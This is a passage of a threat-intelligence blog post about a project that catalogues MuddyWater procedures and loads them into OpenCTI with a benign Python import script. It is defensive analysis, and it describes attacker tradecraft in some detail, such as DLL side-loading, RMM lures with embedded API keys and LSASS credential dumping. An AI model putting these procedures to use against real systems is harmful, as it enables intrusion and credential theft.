href="https://ics-cert.kaspersky.com/wp-content/uploads/2024/10/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2024-en.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2024 PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2025/09/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2025-en-2.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2025 PDF</a></li><li><a href="https://documents.trendmicro.com/assets/pdf/Annual_APT_Report_2025.pdf">Trend Micro — Annual APT Report 2025 PDF</a></li><li><a href="https://go.intel471.com/hubfs/Emerging%20Threats/2025%20Emerging%20Threats/Upd%20HUNTER%20-%20Iranian%20Threat%20Actor%20Coverage.pdf">Intel 471 — HUNTER Iranian Threat Actor Coverage PDF</a></li></ol><p><strong>Iran Threat Context and Comparison Actors</strong></p><ol><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran">CISA — Iran Threat Overview and Advisories</a></li><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors/iran/publications">CISA — Iran state-sponsored cyber threat publications</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">CISA — AA23–335A: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors</a></li><li><a href="https://www.cisa.gov/sites/default/files/2023-12/aa23-335a-irgc-affiliated-cyber-actors-exploit-plcs-in-multiple-sectors-1.pdf">CISA — AA23–335A PDF</a></li><li><a href="https://attack.mitre.org/groups/G0049/">MITRE ATT&amp;CK — APT34</a></li><li><a href="https://attack.mitre.org/groups/G0059/">MITRE ATT&amp;CK — APT35 / Charming Kitten</a></li><li><a href="https://attack.mitre.org/groups/G1030/">MITRE ATT&amp;CK — Agrius</a></li><li><a href="https://www.microsoft.com/en-us/security/security-insider/mint-sandstorm">Microsoft — Mint Sandstorm</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/">Microsoft — Peach Sandstorm deploys new custom Tickler malware</a></li><li><a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide">Microsoft Learn — How Microsoft names threat actors</a></li><li><a href="https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/">SentinelOne — Iranian Cyber Activity Outlook</a></li><li><a href="https://mirror.gpmidi.net/vx-underground/Malware%20Analysis/2024/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability/Paper/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability.pdf">Trellix — The Iranian Cyber Capability PDF</a></li></ol><p><strong>OpenCTI / STIX / Knowledge Graph References</strong></p><ol><li><a href="https://docs.opencti.io/latest/usage/data-model/">OpenCTI documentation — Data model</a></li><li><a href="https://docs.opencti.io/latest/reference/api/">OpenCTI documentation — GraphQL API</a></li><li><a href="https://docs.opencti.io/latest/usage/deduplication/">OpenCTI documentation — Deduplication</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html">OASIS — STIX 2.1 HTML specification</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/cs02/stix-v2.1-cs02.pdf">OASIS — STIX 2.1 PDF specification</a></li><li><a href="https://stixproject.github.io/documentation/concepts/relationships/">STIX Project — Relationships</a></li><li><a href="https://arxiv.org/abs/2303.09999">STIXnet — Extracting STIX Objects in CTI Reports</a></li><li><a href="https://arxiv.org/abs/2507.16576">From Text to Actionable Intelligence: Automating STIX Entity and Relationship Extraction</a></li><li><a href="https://arxiv.org/abs/2605.15904">Context-aware Entity-Relation Extraction for Threat Intelligence Knowledge Graphs</a></li></ol><p><strong>Validate Before Promoting</strong></p><ol><li><a href="https://brandefense.io/wp-content/uploads/2025/10/brandefense.io-muddywater-iran-linked-espionage-group-expanding-global-reach-muddywater-.pdf">Brandefense — MuddyWater PDF</a></li><li><a href="https://assets.kpmg.com/content/dam/kpmgsites/in/pdf/2022/07/KPMG_CTI_Report_muddy.pdf.coredownload.inline.pdf">KPMG — CTI Report MuddyWater PDF</a></li></ol><p><strong>Critical discipline:</strong> AI output was used only for source discovery. Every claim, mapping, and detection record required analyst review before entering the dataset.</p><h3>Phase 2: Procedure Dataset</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ji8MQqr4SpW620AV3QN67A.png"></figure><p>A procedure record is not an ATT&amp;CK technique. ATT&amp;CK describes what a class of actors <em>can</em> do. A procedure record describes what <em>this actor</em> did, in <em>this campaign</em>, as documented by <em>this source</em>, with a specific evidence label attached.</p><p>The distinction matters for detection. “Adversaries use scheduled tasks (T1053.005)” does not help you tune a detection rule. “BugSleep creates a scheduled task with a 43-minute repeat interval (INCD 2024, Observed)” does — because you now have a concrete interval to hunt for, a specific tool name, and a source you can cite in your detection rationale.</p><p>Each of the 10 records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/procedures.yaml">data/procedures.yaml</a> captures four things:</p><ul><li>The specific behavior — not the technique category</li><li>The source references that support it, with evidence labels</li><li>Candidate ATT&amp;CK technique mappings and the reasoning behind each candidate</li><li>Required telemetry, a detection idea, validation plan, and known limitations</li></ul><h4>Confidence Labels</h4><p>Each record carries one of four evidence labels inherited from the source assessment:</p><p><strong>Observed</strong> — the behavior appears directly in source telemetry, a recovered sample, a screenshot, or a government incident report with direct visibility into the event. This is the strongest label and the only one that justifies a high-priority detection without further corroboration.</p><p><strong>Reported</strong> — a source states the behavior occurred, but the evidence is assertion-level rather than artifact-level. Still usable; requires corroboration before relying on it alone.</p><p><strong>Assessed</strong> — the source draws an analytical conclusion based on multiple indicators. Appropriate for ATT&amp;CK candidate mappings; not sufficient alone for a new detection claim.</p><p><strong>Inferred</strong> — analyst conclusion derived from combining multiple reported facts across sources. Weakest label; flag for review before using in production.</p><p>All 10 procedures in this dataset carry <strong>Observed</strong> or <strong>High</strong> confidence. That is not a coincidence — it reflects the promotion threshold. Procedures that came only from secondary or inferred sources were not promoted into data/procedures.yaml; they stayed in the claim extraction notes for future work.</p><h4>The 10 Procedures</h4><p><strong>proc_mw_0001 — Spearphishing Email Delivery</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1566.001, T1566.002, T1534</em></p><p>Three delivery variants documented across all three primary government sources: ZIP attachments containing macro-enabled Excel files or PDFs; email links to Egnyte or OneDrive delivering compressed RMM installers; and emails sent from compromised legitimate accounts to increase lure credibility. In 2024, a Microsoft-update-lure campaign sent to 10,000+ accounts embedded a PowerShell API key, granting the actor direct agent access immediately after the RMM tool installed. Three independent government sources corroborate this procedure — it is the highest-confidence initial access vector in the dataset.</p><p><strong>proc_mw_0002 — Public-Facing Exploitation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1190</em></p><p>Secondary initial access vector to phishing. Documented CVEs: CVE-2020–1472 (Netlogon/Zerologon), CVE-2020–0688 (Exchange), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities confirmed by INCD 2024. Exploitation is typically followed by RMM tool deployment or custom backdoor staging. The VPN claim from INCD 2024 does not name a specific CVE — treat as Reported until a CVE is attributed.</p><p><strong>proc_mw_0003 — PowerShell Execution and Script Obfuscation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1059.001, T1027</em></p><p>Cross-cutting technique present in every tool tier. PowGoop uses an obfuscated .dat + config.txt PowerShell chain for C2 beaconing. POWERSTATS is a persistent PowerShell backdoor. The 2024 lure embedded an API key executed via PowerShell to grant direct agent access. Obfuscation is applied consistently via Base64, XOR, and custom encoding. Detection anchor: Script Block Logging (EID 4104) is the primary telemetry dependency — without it, this procedure is nearly invisible to endpoint-only detection.</p><p><strong>proc_mw_0004 — DLL Side-Loading</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1574.002</em></p><p>PowGoop’s canonical execution method: a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load and execute the malicious DLL. INCD 2024 confirms continued use across the 2024 toolset. Detection requires Sysmon EID 7 (image load) with signing status — not available from Windows Event Log alone. This is the most telemetry-constrained procedure in the dataset; validation was PARTIAL because the lab's stub DLL did not produce sufficient EID 7 signal.</p><p><strong>proc_mw_0005 — Registry Run Key and Startup Folder Persistence</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1547.001</em></p><p>Small Sieve adds index.exe under the Run key named OutlookMicrosift — mimicking a Microsoft application name. Canopy installs its first WSF script in the startup folder. AA22-055A documents an additional key: SystemTextEncoding. INCD 2024 confirms continued use. The specific key names (OutlookMicrosift, SystemTextEncoding) are high-confidence IoCs when present; a detection based only on "new Run key written by a non-installer" will generate noise in most enterprise environments.</p><p><strong>proc_mw_0006 — Scheduled Task (43-Minute Beacon)</strong> <em>Confidence: Observed · Source: INCD 2024 (single source) · ATT&amp;CK: T1053.005</em></p><p>BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing. The interval is documented as customizable, but 43 minutes is the specific value observed in the INCD 2024 analysis. This is a single-source procedure — INCD 2024 only — which is why it carries a coverage score of 4 (correlated analytic) rather than 5 in the detection atlas. Before treating this interval as a high-confidence fingerprint in production, corroborate with a vendor source.</p><p><strong>proc_mw_0007 — RMM Tool Abuse</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024, multiple vendor sources · ATT&amp;CK: T1219</em></p><p>The most consistently documented technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple vendor sources), SimpleHelp, Level, PDQConnect (2024). The 2024 lure embedded an API key so the actor had direct agent access the moment the victim installed the tool. Detection must rely on delivery context and parent process — not binary name alone, since these are legitimate commercial tools.</p><p><strong>proc_mw_0008 — C2 via Web Protocols and DNS Tunneling</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1071.001, T1572, T1102</em></p><p>Multiple C2 channels documented. Small Sieve beacons via Telegram Bot API over HTTPS. Canopy sends collected data via HTTP POST. Blackout uses GET /questions and POST /about-us. AnchorRAT communicates over HTTPS port 443 in JSON format. Mori uses DNS tunneling. In 2024, Rentry.co was used as a legitimate platform for C2 redirection. The Telegram API is the highest-confidence detection anchor: outbound HTTPS to api.telegram.org from a non-browser process is unusual in enterprise environments and directly attributed across multiple sources.</p><p><strong>proc_mw_0009 — WMI System Discovery Survey</strong> <em>Confidence: Observed · Source: AA22–055A (script documented verbatim) · ATT&amp;CK: T1047, T1082, T1016, T1033, T1518.001</em></p><p>MuddyWater runs a PowerShell script that queries WMI to collect: IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username, and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2. The exact script is reproduced in the CISA advisory. The SecurityCenter2 query is the detection anchor: legitimate enterprise software rarely queries this WMI namespace outside AV management contexts, making it a low-noise signal.</p><p><strong>proc_mw_0010 — Credential Dumping from LSASS and Credential Stores</strong> <em>Confidence: Observed · Source: AA22–055A · ATT&amp;CK: T1003.001, T1003.004, T1003.005</em></p><p>Post-access credential access using three tools: Mimikatz and procdump64.exe against LSASS memory (T1003.001); LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005). Used post-exploitation to enable lateral movement with harvested credentials. Detection via Sysmon EID 10 (process accessing lsass.exe) is tool-agnostic — it fires regardless of whether the actor uses Mimikatz, procdump, or a custom variant with a different binary name. This is the most reliable detection path for this procedure.</p><h3>Phase 3: OpenCTI Knowledge Graph</h3><p>The procedure dataset and source register go into a self-hosted OpenCTI 6.2 instance. This creates the analytical record — queryable, relationship-aware, ATT&amp;CK-linked.</p><h3>OpenCTI Deployment</h3><p>The stack used in this project is documented and publicly reproducible. The full deployment — Docker Compose, connectors, and an AI enrichment connector that calls Claude via the Anthropic API — lives in a dedicated project:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200/opencti-intelligent-shield">github.com/anpa1200/opencti-intelligent-shield</a></li></ul><p><a href="https://github.com/anpa1200/opencti-intelligent-shield">GitHub - anpa1200/opencti-intelligent-shield: OpenCTI AI-driven threat intelligence enrichment with Claude and Docusaurus documentation</a></p><ul><li><strong>Medium guide:</strong></li></ul><p><a href="https://medium.com/@1200km/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a></p><ul><li><strong>Main guide:</strong> <a href="https://anpa1200.github.io/opencti-intelligent-shield/">anpa1200.github.io/opencti-intelligent-shield</a></li></ul><p><a href="https://anpa1200.github.io/opencti-intelligent-shield">OpenCTI AI Enrichment | The Intelligent Shield</a></p><p>The Intelligent Shield project covers: OpenCTI core stack (Redis, Elasticsearch, MinIO, RabbitMQ, platform, workers), MITRE ATT&amp;CK connector, and a custom internal enrichment connector that uses Claude to automatically summarize and enrich threat objects. Docker Compose files, a sanitized .env.example, and full setup instructions are all version-controlled.</p><p>To spin up the stack standalone (outside Operation Desert Hydra):</p><pre>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd openCTI<br>cp .env.example .env<br># fill in tokens and passwords<br>./scripts/start-all.sh   # OpenCTI at :8080<br>./scripts/stop-all.sh    # halt, preserves volumes</pre><p>In the context of Operation Desert Hydra the stack is embedded in stack/ and started with bash start.sh — no separate clone needed. The Intelligent Shield project is the standalone reference deployment for anyone who wants OpenCTI without the lab.</p><h4>Step 10: Stack Start</h4><pre>bash start.sh --skip-lab   # starts OpenCTI + Elasticsearch + Kibana only</pre><p>All 12 core containers start: Redis, Elasticsearch, MinIO, RabbitMQ, OpenCTI platform, 3 workers, and the MITRE ATT&amp;CK connector.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_8pjCgFqyge4o-bahQTX6Q.png"></figure><p><strong>Result:</strong> OpenCTI reachable at http://localhost:8080. All containers healthy.</p><h4>Step 11: MITRE ATT&amp;CK Connector Sync</h4><p>The MITRE ATT&amp;CK connector loads 846 techniques into the graph. This sync must complete before the import script can link procedures to techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k4o9xri96voJcB0EUQPqfg.png"></figure><p><strong>Result:</strong> 846 ATT&amp;CK patterns loaded. Connector state: ACTIVE.</p><h4>Step 12: Import Script</h4><p>Script: <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/tools/opencti_import.py"><strong>tools/opencti_import.py</strong></a></p><pre>export OPENCTI_URL=http://localhost:8080<br>export OPENCTI_TOKEN=&lt;admin token from stack/.env&gt;<br>python3 tools/opencti_import.py</pre><p>The script reads data/sources.yaml and data/procedures.yaml — it does not hardcode any intelligence. The YAML files are the single source of truth; the script is just a translation layer from those files into OpenCTI's API.</p><p><strong>What it creates and why:</strong></p><p><strong>Step 1 — Iran MOIS (Identity: Organization).</strong> Every object in OpenCTI needs a createdBy reference. Creating the sponsoring organization first gives all downstream objects a consistent authoring context and makes the attribution relationship explicit in the graph: MuddyWater → attributed-to → Iran MOIS.</p><p><strong>Step 2 — MuddyWater (Intrusion Set).</strong> The intrusion set object carries all known aliases: Seedworm, Mango Sandstorm, TA450, Static Kitten, TEMP.Zagros, Mercury, DEV-1084. Aliases matter for deduplication — OpenCTI uses them to avoid creating duplicate entities when the same actor appears under different names in different reports.</p><p><strong>Step 3 — Malware catalog (9 objects).</strong> Each actor-developed tool gets a Malware object with a description derived from source reporting. The catalog: POWERSTATS, PowGoop, Small Sieve, Canopy, Mori, BugSleep, AnchorRAT, SyncroRAT, DarkBit.</p><p><strong>Step 4 — Tool catalog (4 objects).</strong> Legitimate tools abused by the actor are STIX Tool objects, not Malware — the distinction matters for downstream analysis. The catalog: AteraAgent, SimpleHelp, Mimikatz, LaZagne.</p><p><strong>Step 5 — uses relationships.</strong> MuddyWater → uses → each malware and tool object. These relationships make the graph queryable: “which tools does this actor use?” returns all 13 objects in one hop.</p><p><strong>Step 6 — Reports from sources.yaml.</strong> One Report object per promoted source, with publisher, reliability rating, credibility score, actor claims, key entities, and ATT&amp;CK candidates written into the description. MuddyWater is added as an object reference so each report is queryable from the actor page.</p><p><strong>Step 7 — ATT&amp;CK pattern links from procedures.yaml.</strong> Iterates all attck_candidates across the 10 procedure records and creates MuddyWater → uses → ATT&amp;CK technique relationships. If the MITRE connector has not yet synced a technique, the script creates a stub Attack Pattern object (with x_mitre_id set) and flags it for enrichment. This prevents the import from failing on a timing issue between the connector sync and the import run.</p><p>The script is <strong>idempotent</strong>: every object lookup uses a read() before create(). Re-running after a partial failure or after the MITRE connector syncs simply confirms existing objects and fills in any gaps.</p><pre>#!/usr/bin/env python3<br>"""<br>Desert Hydra — Phase 3 OpenCTI graph import.Reads data/sources.yaml and data/procedures.yaml and creates:<br>  - Identity:       Iran MOIS (organization)<br>  - Intrusion Set:  MuddyWater (with all known aliases)<br>  - Malware:        actor-developed tools (9 objects)<br>  - Tool:           legitimate tools abused (4 objects)<br>  - Reports:        one per promoted source (up to 20)<br>  - Relationships:  attributed-to, uses (malware/tool/ATT&amp;CK)<br>Idempotent - existing objects are not duplicated.<br>ATT&amp;CK pattern links are skipped for techniques not yet synced by the<br>MITRE connector; re-run the script after the MITRE sync completes.<br>Usage:<br>    export OPENCTI_URL=http://localhost:8080<br>    export OPENCTI_TOKEN=&lt;admin-token&gt;<br>    python3 tools/opencti_import.py<br>"""<br>import os<br>import sys<br>import yaml<br>from pathlib import Path<br>from pycti import OpenCTIApiClient<br>from pycti.entities.opencti_identity import IdentityTypes<br># ── Bootstrap ─────────────────────────────────────────────────────────────────<br>OPENCTI_URL   = os.environ.get("OPENCTI_URL",   "http://localhost:8080")<br>OPENCTI_TOKEN = os.environ.get("OPENCTI_TOKEN", "")<br>REPO_ROOT     = Path(__file__).resolve().parent.parent<br>if not OPENCTI_TOKEN:<br>    sys.exit("ERROR: set OPENCTI_TOKEN environment variable")<br>api = OpenCTIApiClient(url=OPENCTI_URL, token=OPENCTI_TOKEN, log_level="error")<br>print(f"[desert-hydra] Connected  {OPENCTI_URL}")<br># ── Load YAML data ─────────────────────────────────────────────────────────────<br>with open(REPO_ROOT / "data" / "sources.yaml") as f:<br>    SOURCES = yaml.safe_load(f)["sources"]<br>with open(REPO_ROOT / "data" / "procedures.yaml") as f:<br>    PROCEDURES = yaml.safe_load(f)["procedures"]<br>print(f"[desert-hydra] Loaded {len(SOURCES)} sources, {len(PROCEDURES)} procedures")<br># ── TLP:WHITE ─────────────────────────────────────────────────────────────────<br>def get_tlp_white():<br>    results = api.marking_definition.list(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "definition", "values": ["TLP:WHITE"]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if results:<br>        return results[0]["id"]<br>    obj = api.marking_definition.create(<br>        definition_type="TLP",<br>        definition="TLP:WHITE",<br>        x_opencti_color="#ffffff",<br>        x_opencti_order=0,<br>    )<br>    return obj["id"]<br>TLP_WHITE = get_tlp_white()<br># ── Helpers ───────────────────────────────────────────────────────────────────<br>def _find(accessor, name):<br>    """Look up a STIX object by name. Returns the object dict or None."""<br>    return accessor.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "name", "values": [name]}],<br>            "filterGroups": [],<br>        }<br>    )<br><br>def link(from_id, to_id, rel_type, confidence=80):<br>    """Create a STIX core relationship; silently skip if it already exists."""<br>    try:<br>        api.stix_core_relationship.create(<br>            fromId=from_id,<br>            toId=to_id,<br>            relationship_type=rel_type,<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>        )<br>    except Exception:<br>        pass<br><br>ATTCK_NAMES = {<br>    "T1574.002": "DLL Side-Loading",<br>    "T1574.001": "DLL Search Order Hijacking",<br>    "T1546.015": "Component Object Model Hijacking",<br>    "T1218.010": "Regsvr32",<br>}<br>def find_or_create_attack_pattern(mitre_id):<br>    """Look up an ATT&amp;CK pattern by x_mitre_id. Create stub if not synced yet."""<br>    result = api.attack_pattern.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "x_mitre_id", "values": [mitre_id]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if result:<br>        return result["id"], False<br>    name = ATTCK_NAMES.get(mitre_id, mitre_id)<br>    obj = api.attack_pattern.create(<br>        name=name,<br>        x_mitre_id=mitre_id,<br>        description=f"MITRE ATT&amp;CK technique {mitre_id}. Created as stub pending MITRE connector sync.",<br>        objectMarking=[TLP_WHITE],<br>        confidence=75,<br>    )<br>    return obj["id"], True<br># ── Step 1: Iran MOIS Identity ────────────────────────────────────────────────<br>existing = _find(api.identity, "Iran MOIS")<br>if existing:<br>    MOIS_ID = existing["id"]<br>else:<br>    obj = api.identity.create(<br>        type=IdentityTypes.ORGANIZATION.value,<br>        name="Iran MOIS",<br>        description=(<br>            "Iranian Ministry of Intelligence and Security (MOIS). "<br>            "State sponsor attributed to MuddyWater cyber operations by CISA, FBI, "<br>            "CNMF, NCSC-UK, and NSA in joint advisory AA22-055A (February 2022)."<br>        ),<br>        objectMarking=[TLP_WHITE],<br>        confidence=85,<br>    )<br>    MOIS_ID = obj["id"]<br># ── Step 2: MuddyWater Intrusion Set ──────────────────────────────────────────<br>existing = _find(api.intrusion_set, "MuddyWater")<br>if existing:<br>    MW_ID = existing["id"]<br>else:<br>    obj = api.intrusion_set.create(<br>        name="MuddyWater",<br>        aliases=[<br>            "Seedworm", "Mango Sandstorm", "TA450",<br>            "Static Kitten", "TEMP.Zagros", "Mercury", "DEV-1084",<br>        ],<br>        description=(<br>            "Iranian MOIS subordinate threat group active since at least 2017. "<br>            "Targets government, defense, telecom, oil and gas, and MSPs globally. "<br>            "Significant focus on Israeli organizations since 2022. Known for "<br>            "spearphishing, RMM tool abuse, and a shift toward in-house tooling "<br>            "(BugSleep, AnchorRAT) beginning ~May 2024."<br>        ),<br>        resource_level="government",<br>        primary_motivation="espionage",<br>        confidence=85,<br>        objectMarking=[TLP_WHITE],<br>        createdBy=MOIS_ID,<br>    )<br>    MW_ID = obj["id"]<br>link(MW_ID, MOIS_ID, "attributed-to", 85)<br># ── Step 3: Malware catalog ────────────────────────────────────────────────────<br>MALWARE_CATALOG = [<br>    {"name": "POWERSTATS",  "aliases": ["Powermud"],   "description": "MuddyWater first-stage PowerShell backdoor (MITRE S0223)."},<br>    {"name": "PowGoop",     "aliases": ["Goopdate"],   "description": "DLL loader hijacking GoogleUpdate.exe via side-loading (MITRE S1046)."},<br>    {"name": "Small Sieve", "aliases": [],             "description": "Python backdoor compiled as NSIS; Telegram Bot API C2; OutlookMicrosift Run key."},<br>    {"name": "Canopy",      "aliases": ["Starwhale"],  "description": "Excel-macro dropper; startup folder persistence; HTTP POST C2."},<br>    {"name": "Mori",        "aliases": [],             "description": "DNS-tunneling backdoor deployed as FML.dll via regsvr32.exe."},<br>    {"name": "BugSleep",    "aliases": [],             "description": "In-house backdoor (2024); 43-minute scheduled task; shellcode injection."},<br>    {"name": "AnchorRAT",   "aliases": [],             "description": "Custom RAT (2024); COM hijacking persistence (T1546.015)."},<br>    {"name": "SyncroRAT",   "aliases": [],             "description": "RMM-based RAT; Technion campaign (Feb 2023); Log4j initial access."},<br>    {"name": "DarkBit",     "aliases": [],             "description": "Ransomware/wiper; Technion attack; vssadmin shadow copy deletion."},<br>]<br>MALWARE_IDS = {}<br>for m in MALWARE_CATALOG:<br>    existing = _find(api.malware, m["name"])<br>    if existing:<br>        MALWARE_IDS[m["name"]] = existing["id"]<br>    else:<br>        obj = api.malware.create(<br>            name=m["name"], aliases=m["aliases"],<br>            description=m["description"], is_family=False,<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        MALWARE_IDS[m["name"]] = obj["id"]<br># ── Step 4: Tool catalog ──────────────────────────────────────────────────────<br>TOOL_CATALOG = [<br>    {"name": "AteraAgent",  "aliases": ["Atera RMM"], "description": "Commercial RMM abused for persistent remote access via phishing."},<br>    {"name": "SimpleHelp",  "aliases": [],            "description": "Commercial RMM abused in 2024 Israeli targeting."},<br>    {"name": "Mimikatz",    "aliases": [],            "description": "LSASS credential dumping (T1003.001), used with procdump64.exe."},<br>    {"name": "LaZagne",     "aliases": [],            "description": "LSA secrets (T1003.004) and cached domain credential dumping (T1003.005)."},<br>]<br>TOOL_IDS = {}<br>for t in TOOL_CATALOG:<br>    existing = _find(api.tool, t["name"])<br>    if existing:<br>        TOOL_IDS[t["name"]] = existing["id"]<br>    else:<br>        obj = api.tool.create(<br>            name=t["name"], aliases=t["aliases"],<br>            description=t["description"],<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        TOOL_IDS[t["name"]] = obj["id"]<br># ── Step 5: uses relationships ────────────────────────────────────────────────<br>for mid in MALWARE_IDS.values():<br>    link(MW_ID, mid, "uses", 80)<br>for tid in TOOL_IDS.values():<br>    link(MW_ID, tid, "uses", 80)<br># ── Step 6: Reports from sources.yaml ────────────────────────────────────────<br>SOURCE_DATES = {<br>    "src_usgov_aa22_055a_pdf_mirror":        "2022-02-24T00:00:00.000Z",<br>    "src_incd_muddywater_darkbit_2023":      "2023-02-07T00:00:00.000Z",<br>    "src_incd_muddywater_2024_evolution":    "2024-06-01T00:00:00.000Z",<br>    "src_cisa_aa22_055a_page":               "2022-02-24T00:00:00.000Z",<br>    "src_ncsc_uk_muddywater_joint_advisory": "2022-02-24T00:00:00.000Z",<br>    "src_incd_recent_phishing_1947":         "2024-09-01T00:00:00.000Z",<br>    "src_mitre_attack_muddywater_g0069":     "2024-01-01T00:00:00.000Z",<br>}<br>REPORT_IDS = {}<br>for src in SOURCES:<br>    src_id   = src["id"]<br>    title    = src["title"]<br>    pub_date = SOURCE_DATES.get(src_id, "2023-01-01T00:00:00.000Z")<br>    confidence = 85 if src.get("source_reliability") == "A" else 70<br>    description = (<br>        f"Publisher: {src['publisher']}\n"<br>        f"Reliability: {src.get('source_reliability','?')} / "<br>        f"Credibility: {src.get('information_credibility','?')}\n"<br>        f"URL: {src['url']}\n"<br>        f"Actor claims: {', '.join(src.get('actor_claims', []))}\n"<br>        f"ATT&amp;CK candidates: {', '.join(src.get('candidate_attck_techniques', []))}"<br>    )<br>    existing = _find(api.report, title)<br>    if existing:<br>        REPORT_IDS[src_id] = existing["id"]<br>    else:<br>        obj = api.report.create(<br>            name=title, published=pub_date,<br>            description=description,<br>            report_types=["threat-report"],<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>            createdBy=MOIS_ID,<br>            objects=[MW_ID],<br>        )<br>        REPORT_IDS[src_id] = obj["id"]<br># ── Step 7: ATT&amp;CK pattern links from procedures ──────────────────────────────<br>linked, stubs = set(), []<br>for proc in PROCEDURES:<br>    for candidate in proc.get("attck_candidates", []):<br>        tid = candidate["technique"]<br>        if tid in linked:<br>            continue<br>        pattern_id, created_as_stub = find_or_create_attack_pattern(tid)<br>        link(MW_ID, pattern_id, "uses", 75)<br>        linked.add(tid)<br>        if created_as_stub:<br>            stubs.append(tid)<br># ── Summary ───────────────────────────────────────────────────────────────────<br>print(f"Import complete - malware: {len(MALWARE_IDS)}, tools: {len(TOOL_IDS)}, "<br>      f"reports: {len(REPORT_IDS)}, ATT&amp;CK links: {len(linked)}, stubs: {len(stubs)}")<br></pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WMvnfWfF50hj3Rk60DBAxA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XMTEbgDPokzU9iTK3sjEww.png"></figure><p><strong>Result:</strong> All objects created. Re-run confirms idempotency (no duplicates).</p><h4>Step 13: Intrusion Set Verification</h4><p><strong>Result:</strong> MuddyWater entity with all aliases, Iran MOIS attribution relationship, campaign links, and malware/tool associations confirmed in OpenCTI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5KWUHIP3nkUhF6wpQpDa3g.png"></figure><h4>Step 14: Knowledge Graph</h4><p><strong>Result:</strong> Graph shows MuddyWater → 9 malware, 4 tools, 3 campaigns, 21 ATT&amp;CK techniques — all with source-annotated relationship edges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-B2D00HhbhmdA5rtGm7klA.png"></figure><h4>Step 15: ATT&amp;CK Matrix Coverage</h4><p><strong>Result:</strong> 21 techniques highlighted across 8 tactics in the ATT&amp;CK Enterprise matrix.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4XphzS2vtf-peVJ-ArTglg.png"></figure><h4>Step 16: BugSleep Malware Detail</h4><p><strong>Result:</strong> BugSleep malware object with INCD 2024 source annotation, T1053.005 relationship (43-minute task), and C2 technique links confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3rt63a6jCO_-fk-BLdyaTw.png"></figure><h4>Step 17: Reports List</h4><p><strong>Result:</strong> 20 report objects, one per promoted source. Each report links to the procedures and techniques it evidences.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-Ej71hGDspW3ahdqZWATAA.png"></figure><h4>Step 19: OpenCTI Dashboard</h4><p><strong>Result:</strong> Custom dashboard showing technique frequency heatmap by source tier — highest-corroborated techniques visible at a glance.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HccHBJxzb-ZZu93WImMhg.png"></figure><h3>Phase 4: Detection Atlas</h3><p>The detection atlas is the core analytical output. Each of the 11 detection records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/detections.yaml">data/detections.yaml</a> 